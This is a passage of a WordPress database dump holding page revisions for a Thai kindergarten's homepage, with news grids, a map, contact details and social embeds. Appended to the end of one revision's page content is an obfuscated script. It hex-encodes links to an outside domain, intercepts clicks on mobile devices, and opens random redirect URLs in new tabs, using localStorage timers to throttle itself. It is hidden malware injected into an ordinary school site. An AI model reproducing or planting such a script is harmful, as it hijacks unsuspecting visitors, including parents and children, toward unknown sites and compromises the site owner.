oads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 08:55:00','2024-08-30 01:55:00','',19,'http://watprato.ssk.in.th/?p=279',0,'revision','',0),
(280,2,'2024-08-30 08:58:42','2024-08-30 01:58:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 